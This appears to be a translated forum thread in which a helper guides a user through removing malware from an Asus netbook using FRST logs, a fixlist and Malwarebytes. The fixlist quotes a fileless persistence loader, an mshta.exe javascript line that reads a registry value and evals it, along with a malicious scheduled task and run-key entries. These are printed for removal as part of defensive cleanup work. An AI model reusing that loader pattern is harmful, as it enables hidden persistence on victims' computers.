Asus Eee PC 1001PX: multiple problems


offline
  • Joined: 26 Mar 2011
  • Posts: 221

Dear all, I have several problems.
I use Windows 7 Home 32-bit. The notebook itself is very slow, which was not the case at the beginning; even now, as I write, I wait a few seconds to type a word. Further, I will attach a PrtSc. I have several programs that I cannot uninstall, because when I go to Control Panel, to uninstall programs, they are not there. Mozilla runs very slowly. Sometimes, right when the notebook is switched on, it throws up some message, but it disappears so quickly that I do not manage to read what it is. Sometimes the sound is good, sometimes bad... In general my problem is the very, very slow operation of the notebook itself. Please help, a system refresh or whatever. Thanks in advance.



Here are the FRST logs as well, per the instructions at the start of this section of the forum.
Thanks in advance.


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 23-04-2017 01
Ran by ASUS (administrator) on ASUS-PC (25-04-2017 19:33:33)
Running from C:\Users\ASUS\Desktop
Loaded Profiles: ASUS (Available Profiles: ASUS)
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
() C:\ProgramData\mts mobilni internet\OnlineUpdate\ouc.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.3\GoogleCrashHandler.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

Winlogon\Notify\atxitam: C:\Users\ASUS\AppData\Local\atxitam.dll [2017-04-19] ()
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\Run: [*qeourepp<*>] => "C:\Users\ASUS\AppData\Local\4214\6037.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\MountPoints2: {7c3ddaa8-4a9f-11e5-b743-bcaec51997ab} - E:\Startme.exe
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\MountPoints2: {f414bcae-d9e4-11e4-8ed9-bcaec51997ab} - E:\AutoRun.exe
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\ASUS\AppData\Local\YmtpPack\drmdugbj.dll ATTENTION
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll [2017-04-14] ()
GroupPolicy: Restriction ? <======= ATTENTION
GroupPolicy\User: Restriction ? <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 89.216.1.30 89.216.1.50
Tcpip\..\Interfaces\{0AAFBB01-C496-474D-8BC2-940C0A776BD8}: [NameServer] 172.21.21.158 172.21.21.157
Tcpip\..\Interfaces\{578AA652-166E-433B-86EA-9467752D23F8}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5DAACF19-081A-4322-9054-F1578CC1D2BD}: [DhcpNameServer] 89.216.1.30 89.216.1.50
Tcpip\..\Interfaces\{724FAD3D-C7A8-435F-B037-9FF54294D378}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{F503BD61-4609-4AE6-8B95-4C67A8ABD4A1}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://mail.ru/cnt/10445?gp=811040
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-21-1739059202-3565848293-805263540-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BD8F6AC8F-AB1B-4883-859B-DCE6FC23CC1A%7D&gp=811041
SearchScopes: HKU\S-1-5-21-1739059202-3565848293-805263540-1000 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BD8F6AC8F-AB1B-4883-859B-DCE6FC23CC1A%7D&gp=811041
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll [2014-04-09] (McAfee, Inc.)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2014-04-25] (Microsoft Corporation)
BHO: Ďîčńę@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\ASUS\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll [2017-04-21] (Mail.Ru)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2014-04-08] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-04-01] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Profiles\ij5a11r8.default [2017-04-25]
FF NewTab: Mozilla\Firefox\Profiles\ij5a11r8.default -> about:newtab
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ij5a11r8.default -> Поиск@Mail.Ru
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ij5a11r8.default -> Поиск@Mail.Ru
FF Homepage: Mozilla\Firefox\Profiles\ij5a11r8.default -> hxxps://www.google.rs/
FF Keyword.URL: Mozilla\Firefox\Profiles\ij5a11r8.default -> hxxp://go.mail.ru/distib/ep/?product_id=%7B6FED2366-7EC4-400F-AC64-DB273A71E665%7D&gp=811037
FF SearchPlugin: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Profiles\ij5a11r8.default\searchplugins\mailru.xml [2017-04-21]
FF Extension: (Skype) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-14] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2014-01-23] (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-14] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-14] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1739059202-3565848293-805263540-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\ASUS\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2014-01-23] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxps://mail.ru/cnt/11956636?rciguc__PARAM__
CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=811040"
CHR NewTab: Default -> "chrome-extension://oelpkepjlgmehajehfeicfbjdiobdkfj/visual-bookmarks.html"

CHR DefaultSearchURL: Default -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&product_id=%7B43A7E749-EF1D-4494-A885-6758E5B4AA85%7D&gp=811041
CHR DefaultSearchKeyword: Default -> mail.ru
CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/ff3?q={searchTerms}
CHR Profile: C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default [2017-04-21]
CHR Extension: (Docs) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-03-07]
CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccfifbojenkenpkmnbnndeadpfdiffof [2017-04-21]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-04]
CHR Extension: (Визуальные Закладки Mail.Ru) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\oelpkepjlgmehajehfeicfbjdiobdkfj [2017-04-21]
CHR Extension: (Mail.Ru) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\ojlcebdkbpjdpiligkdbbkdkfjmchbfd [2017-04-21]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-07]
CHR HKLM\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1739059202-3565848293-805263540-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S3 Disc Soft Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusService.exe [813328 2014-04-28] (Disc Soft Ltd)
R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [276048 2013-02-06] ()
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
S2 mts mobilni internet. RunOuc; C:\Program Files\mts mobilni internet\UpdateDog\ouc.exe [656976 2013-05-21] ()
S3 Sony PC Companion; C:\Program Files\Sony\Sony PC Companion\PCCService.exe [155520 2015-06-10] (Avanquest Software)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 andnetadb; C:\Windows\System32\Drivers\lgandnetadb.sys [25856 2014-05-27] (Google Inc)
S3 AndnetBus; C:\Windows\System32\DRIVERS\lgandnetbus.sys [15744 2014-05-27] (LG Electronics Inc.)
S3 AndNetDiag; C:\Windows\System32\DRIVERS\lgandnetdiag.sys [23168 2014-05-27] (LG Electronics Inc.)
S3 ANDNetModem; C:\Windows\System32\DRIVERS\lgandnetmodem.sys [27776 2014-05-27] (LG Electronics Inc.)
S3 andnetndis; C:\Windows\System32\DRIVERS\lgandnetndis.sys [74240 2014-05-27] (LG Electronics Inc.)
R3 dtscsibus; C:\Windows\System32\DRIVERS\dtscsibus.sys [24704 2014-05-24] (Disc Soft Ltd)
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [26328 2015-08-24] (Sony Mobile Communications)
S3 huawei_cdcacm; C:\Windows\System32\DRIVERS\ew_jucdcacm.sys [101248 2013-03-04] (Huawei Technologies Co., Ltd.)
S3 huawei_ext_ctrl; C:\Windows\System32\DRIVERS\ew_juextctrl.sys [27776 2013-03-04] (Huawei Technologies Co., Ltd.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [208384 2013-06-29] (Huawei Technologies Co., Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-25 19:33 - 2017-04-25 19:34 - 00013400 _____ C:\Users\ASUS\Desktop\FRST.txt
2017-04-25 19:33 - 2017-04-25 19:33 - 01767936 _____ (Farbar) C:\Users\ASUS\Desktop\FRST.exe
2017-04-25 19:33 - 2017-04-25 19:33 - 00000000 ____D C:\FRST
2017-04-21 12:05 - 2017-04-21 12:24 - 00000000 ____D C:\Program Files\Mail.Ru
2017-04-21 12:05 - 2017-04-21 12:05 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Unity
2017-04-21 12:00 - 2017-04-21 12:23 - 00000000 ____D C:\Users\ASUS\AppData\Local\Mail.Ru
2017-04-21 12:00 - 2017-04-21 12:00 - 00000000 ____D C:\ProgramData\Mail.Ru
2017-04-19 10:02 - 2017-04-19 10:02 - 00089088 _____ C:\Users\ASUS\AppData\Local\atxitam.dll
2017-04-14 21:04 - 2017-04-14 21:04 - 00000000 ____D C:\Users\ASUS\AppData\Local\4214
2017-04-14 20:49 - 2017-04-19 09:53 - 00000000 ____D C:\Users\ASUS\AppData\Local\Omdwics
2017-04-14 20:49 - 2017-04-14 20:50 - 00000000 ____D C:\Users\ASUS\AppData\Local\YmtpPack
2017-04-14 20:47 - 2017-04-14 20:55 - 00000000 ___HD C:\Users\ASUS\AppData\Local\SysHashTable
2017-04-03 20:23 - 2017-04-25 19:23 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Mozilla
2017-04-03 20:12 - 2017-04-21 11:52 - 00000000 ____D C:\Program Files\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-25 19:28 - 2010-11-20 23:01 - 00778150 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-25 19:28 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\inf
2017-04-25 19:22 - 2009-07-14 06:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-25 08:12 - 2009-07-14 06:34 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-25 08:12 - 2009-07-14 06:34 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-22 20:26 - 2014-05-22 21:42 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2017-04-21 12:44 - 2014-05-24 15:07 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-21 12:43 - 2014-05-22 23:13 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\uTorrent
2017-04-21 12:26 - 2015-03-07 21:23 - 00000000 ____D C:\Program Files\Google
2017-04-21 12:00 - 2009-07-14 04:37 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-04-21 11:52 - 2015-12-24 11:42 - 00001105 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-21 11:52 - 2014-05-22 21:42 - 00001117 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-21 11:35 - 2014-06-29 13:07 - 00000000 ____D C:\Windows\Minidump
2017-04-21 11:35 - 2014-05-24 16:10 - 00000000 ____D C:\Program Files\CCleaner
2017-04-15 14:18 - 2015-01-07 13:42 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-04-14 18:10 - 2014-05-24 15:07 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2017-04-14 18:10 - 2014-05-24 15:07 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2017-04-08 20:45 - 2015-03-07 21:24 - 00002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

==================== Files in the root of some directories =======

2017-04-19 10:02 - 2017-04-19 10:02 - 0089088 _____ () C:\Users\ASUS\AppData\Local\atxitam.dll
2016-02-03 10:16 - 2016-02-03 10:16 - 0963707 _____ () C:\Users\ASUS\AppData\Local\MP4-Player_242.rar
2015-01-13 14:01 - 2015-01-13 14:01 - 0001025 _____ () C:\Users\ASUS\AppData\Local\recently-used.xbel

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-02-14 21:59

==================== End of FRST.txt ============================

offline
  • Joined: 26 Aug 2010
  • Posts: 10621
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

Step 1

Uninstall TeamViewer. You also have no AV program installed, but more on that later.



Step 2

Open Notepad and copy in the following text, which is inside the Code box.

Winlogon\Notify\atxitam: C:\Users\ASUS\AppData\Local\atxitam.dll [2017-04-19] ()
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\Run: [*qeourepp<*>] => "C:\Users\ASUS\AppData\Local\4214\6037.bat" <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll [2017-04-14] ()
GroupPolicy: Restriction ? <======= ATTENTION
GroupPolicy\User: Restriction ? <======= ATTENTION
CHR HKLM\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1739059202-3565848293-805263540-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
2017-04-19 10:02 - 2017-04-19 10:02 - 00089088 _____ C:\Users\ASUS\AppData\Local\atxitam.dll
2017-04-14 21:04 - 2017-04-14 21:04 - 00000000 ____D C:\Users\ASUS\AppData\Local\4214
2017-04-14 20:49 - 2017-04-19 09:53 - 00000000 ____D C:\Users\ASUS\AppData\Local\Omdwics
2017-04-14 20:49 - 2017-04-14 20:50 - 00000000 ____D C:\Users\ASUS\AppData\Local\YmtpPack
Task: {2829448F-86A3-4D9C-A282-7CEFB31780C2} - System32\Tasks\notbadnewsorgmorf => Firefox.exe notbadnews.org/morf <==== ATTENTION
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\Software\Classes\2c8a: "C:\Windows\system32\mshta.exe" "javascript:FN2Hz1="FaY";kG00=new ActiveXObject("WScript.Shell");C9YpI5="NX5";Y03jKK=kG00.RegRead("HKCU\\software\\nshf\\prmfetrm");yzd3g="VNBdNUPl";eval(Y03jKK);V4uuh6U="n9RbwZ";" <===== ATTENTION
C:\ProgramData\Microsoft\Performance\TheftProtection


In Notepad, click File --> Save As
Under Encoding, choose UTF-8.
Name the file Fixlist and save it to the Desktop
Double-click to run FRST.exe again
Click Fix and wait until the program finishes.
If the program asks to restart the computer, let it do so without interruption.
When it has finished, fixlog.txt will open, with contents that you should copy into the thread.
Also, (fixlog.txt) will be located on the Desktop.

offline
  • Joined: 26 Mar 2011
  • Posts: 221

Written: 26 Apr 2017 8:40

Here you go. And how do I uninstall TeamViewer when I do not have it in uninstall programs? Thanks.

Addendum: 26 Apr 2017 8:45

I also have a few more programs installed on the system, but nowhere do I see an option where and how to uninstall them; they are not in uninstall programs, and they are not there through the Revo Uninstaller program either...

Addendum: 26 Apr 2017 8:52

Greetings. For TeamViewer I managed it by going into C:\Program Files, finding the TeamViewer folder, going in, finding uninstall and deleting it; after that some leftovers remained, which I deleted manually. I see I also have some McAfee as an antivirus, but I did not manage to delete it that way.

offline
  • Joined: 26 Aug 2010
  • Posts: 10621
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

Step 1

Pack the following folder into a ZIP, RAR or 7Z archive:

C:\FRST\Quarantine

and send it via the following link:

http://www.mycity.rs/ambulanta-upload.php


If the archive you created is larger than 10 MiB, skip this part.




Step 2

Download Malwarebytes Anti-Malware from this or this or this link and install the application.
Run mb3-setup-consumer-{version}.exe and follow the instructions to install the program. After installation, click Finish.

On first launch, the program will show a "welcome" window. Feel free to close that window.
Note: The program's Premium features are already activated and are valid for 13 days from the moment of installation. You can turn the Premium features off via the Settings > My Account tab.

• Scanner settings - in Settings, click the Protection tab. Under the Scan Options section, turn on the "Scan for rootkits" option.
• Prepare the settings for Threat Scan - in Dashboard, click the Scan Now button. MBAM will update the database and start scanning.

When the scan finishes, if an infection is detected, make sure everything is selected, then click Remove Selected. Restart the computer if the program asks for a restart.
• Submit the log: Under Reports, select the Scan Report with the current date and then click View Report.

Export the log to the Desktop:
- Click the Export button at the bottom, then choose 'Text file (*.txt)'
- In the Save File dialog that appears, click Desktop. In the File name: field, type "mbam" (without quotes) and click Save.
- The message "Your file has been successfully exported" will appear; click Ok and close the window.



• In your reply, attach the mbam.txt log using the "Attach file" ("Prikači fajl") option.

offline
  • Joined: 26 Mar 2011
  • Posts: 221

Written: 26 Apr 2017 14:40

Thanks, here is the first part; I sent it per the instructions. The rest tonight, because I am rushing to work and this scan is still running; so far I have 16 Trojan viruses...
Your file has been successfully uploaded.
Please, in the thread where you were asked to upload the file, inform the person helping you that you have done so successfully.
Thank you.

Addendum: 26 Apr 2017 15:11

It found some 588 infected items, but nowhere did I find Remove Selected, only Quarantine Selected; I did that. It restarted by itself but did not boot the system, so I again did a restart manually. I barely managed to start the Malwarebytes program, that is, it needed some 5 minutes. When I went to Reports, for the date and View Report there is nothing. I will repeat the whole procedure again.

Addendum: 26 Apr 2017 23:59

I would note that the notebook is only now stalling even more; it barely opened Mozilla, and the forum...

offline
  • Joined: 26 Aug 2010
  • Posts: 10621
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

Give me new FRST reports.

offline
  • Joined: 26 Mar 2011
  • Posts: 221

Here you go. I would note again that pages still open very, very slowly when I start Mozilla; for example, loading this page took a minute and a half, and until it has loaded everything it does not let me write text: I start typing a message, it types three letters and freezes.
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 26-04-2017
Ran by ASUS (administrator) on ASUS-PC (28-04-2017 09:25:56)
Running from C:\Users\ASUS\Desktop
Loaded Profiles: ASUS (Available Profiles: ASUS)
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
() C:\ProgramData\mts mobilni internet\OnlineUpdate\ouc.exe
(Skype Technologies) C:\Program Files\Skype\Updater\Updater.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.4\GoogleCrashHandler.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\MountPoints2: {7c3ddaa8-4a9f-11e5-b743-bcaec51997ab} - E:\Startme.exe
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\MountPoints2: {f414bcae-d9e4-11e4-8ed9-bcaec51997ab} - E:\AutoRun.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 89.216.1.30 89.216.1.50
Tcpip\..\Interfaces\{0AAFBB01-C496-474D-8BC2-940C0A776BD8}: [NameServer] 172.21.21.158 172.21.21.157
Tcpip\..\Interfaces\{578AA652-166E-433B-86EA-9467752D23F8}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5DAACF19-081A-4322-9054-F1578CC1D2BD}: [DhcpNameServer] 89.216.1.30 89.216.1.50
Tcpip\..\Interfaces\{724FAD3D-C7A8-435F-B037-9FF54294D378}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{F503BD61-4609-4AE6-8B95-4C67A8ABD4A1}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-21-1739059202-3565848293-805263540-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL =
